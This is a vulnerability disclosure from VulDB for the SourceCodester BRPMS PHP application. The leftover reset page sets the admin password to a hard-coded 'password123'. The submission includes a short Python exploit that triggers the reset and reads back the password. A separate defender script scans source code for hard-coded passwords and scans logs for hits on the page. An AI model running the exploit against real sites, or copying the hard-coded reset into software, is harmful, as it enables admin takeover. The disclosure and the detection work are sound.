Submission #836238: SourceCodester Barangay Resident Profiling and Information Management System (BRPMS) in PHP/MySQL 0 Unverified Password Change

Info

Title: SourceCodester Barangay Resident Profiling and Information Management System (BRPMS) in PHP/MySQL 0 Unverified Password Change
Description: During the assessment of the "Barangay Resident Profiling and Information Management System (BRPMS) in PHP/MySQL", it was observed that the application developer has kept a hard reset password page at "passsword_reset.php". This allows any external user or threat actor to simply call the page and hard reset the password to 'password123', thus allowing any user/threat actor to gain access to the "admin" user with its default credentials. It is highly possible that when this application is used in production by users or an organization, they might forget to delete the page, which will allow users/threat actors to abuse this functionality to gain unauthorized access to the admin user and make unauthorized changes. This can be validated in "password_reset.php", on line 20:

    $new_password = 'password123';

Python3 Exploit Code:

    import re
    import requests

    # Requesting the reset page is enough to trigger the hard reset.
    url = "http://localhost/BRPMS_SANFABIAN/password_reset.php"
    resp = requests.get(url, timeout=10)

    if resp.status_code == 200:
        # The page echoes the new password back inside a <code> element.
        match = re.search(r'Password:</strong>\s*<code>(.*?)</code>', resp.text, re.IGNORECASE)
        if match:
            print(match.group(1))
        else:
            print("Password field not found.")
    else:
        print("Request failed with status:", resp.status_code)
User: Kamran Saifullah (UID 4218)
Submission: 23/05/2026 08:50 PM (17 days ago)
Moderation: 07/06/2026 05:53 PM (15 days later)
Status: Accepted
VulDB Entry: 369135 [SourceCodester Barangay Resident Profiling and Information Management System Password Reset passsword_reset.php weak authentication]
Points: 17
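As an added defender-side example (not code from the VulDB submission or from the BRPMS project), the following Python script implements the two checks a deployment owner would want for this finding: a scan of the web root for PHP files that assign a string literal to a password-like variable (the `$new_password = 'password123';` condition quoted in the description), and a pass over web-server access logs that flags successful requests to the reset page. The directory layout, the PHP stand-in file and the access-log lines are constructed for the example; both spellings of the script name that appear on this page are checked.

```python
"""Defender-side checks for a leftover hard-reset page like the one reported above.
Added example; not code from the VulDB submission or from BRPMS. The sample tree,
the PHP line and the access-log lines below are constructed from what the page states."""
import re
import tempfile
from pathlib import Path

# Both spellings appear on the page (description vs. VulDB entry title), so check both.
RESET_SCRIPT_NAMES = {"password_reset.php", "passsword_reset.php"}

# A PHP assignment of a quoted string literal to a variable whose name contains "pass".
HARDCODED_PW_RE = re.compile(r"""\$(\w*pass\w*)\s*=\s*(['"])(.+?)\2\s*;""", re.IGNORECASE)

# Combined-format access log prefix: client, ident, user, [time], "METHOD path proto", status
ACCESS_LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')

# Constructed log lines; the path is the one used in the submission's exploit URL.
SAMPLE_LOG = [
    '203.0.113.7 - - [23/May/2026:20:50:01 +0000] "GET /BRPMS_SANFABIAN/password_reset.php HTTP/1.1" 200 512 "-" "python-requests"',
    '192.0.2.10 - - [23/May/2026:20:51:10 +0000] "POST /BRPMS_SANFABIAN/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [23/May/2026:20:52:30 +0000] "GET /BRPMS_SANFABIAN/passsword_reset.php HTTP/1.1" 404 200 "-" "curl"',
]


def find_hardcoded_passwords(web_root):
    """Walk a deployed web root and return (file name, variable, literal) for every PHP file
    that assigns a string literal to a password-like variable. A hit inside a file named
    like the reset script is the exact condition the submission describes."""
    findings = []
    for path in sorted(Path(web_root).rglob("*.php")):
        text = path.read_text(encoding="utf-8", errors="replace")
        for m in HARDCODED_PW_RE.finditer(text):
            findings.append((path.name, m.group(1), m.group(3)))
    return findings


def reset_page_hits(log_lines):
    """Return (client, timestamp, path, status) for every access-log line that reached one of
    the reset script names with a 2xx status. Such a hit means the page is still deployed and
    was triggered, so the admin password should be treated as reset to the hard-coded value."""
    hits = []
    for line in log_lines:
        m = ACCESS_LOG_RE.match(line)
        if not m:
            continue
        client, ts, _method, path, status = m.groups()
        basename = path.split("?", 1)[0].rsplit("/", 1)[-1]
        if basename in RESET_SCRIPT_NAMES and status.startswith("2"):
            hits.append((client, ts, path, int(status)))
    return hits


def build_sample_web_root():
    """Create a constructed BRPMS-like tree in a temp dir: one leftover reset page carrying the
    literal quoted on the page, plus a login page that reads the password from the request
    (no literal, so no finding). Returns the directory path."""
    root = Path(tempfile.mkdtemp(prefix="brpms_sample_"))
    (root / "password_reset.php").write_text(
        "<?php\n// constructed stand-in for the reported reset page\n"
        "$new_password = 'password123';\n", encoding="utf-8")
    (root / "login.php").write_text(
        "<?php\n$password = $_POST['password'];\n", encoding="utf-8")
    return str(root)


if __name__ == "__main__":
    root = build_sample_web_root()
    for name, var, literal in find_hardcoded_passwords(root):
        print(f"hard-coded literal: {name}: ${var} = {literal!r}")
    for client, ts, path, status in reset_page_hits(SAMPLE_LOG):
        print(f"reset page reached: {client} {ts} {path} -> {status}")
```

The source scan is the pre-deployment check (run it over the unpacked package before it goes live and delete or lock down any file it reports); the log pass is the after-the-fact check, and a single 2xx hit on the reset page from an unknown client is reason to rotate the admin credentials immediately.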
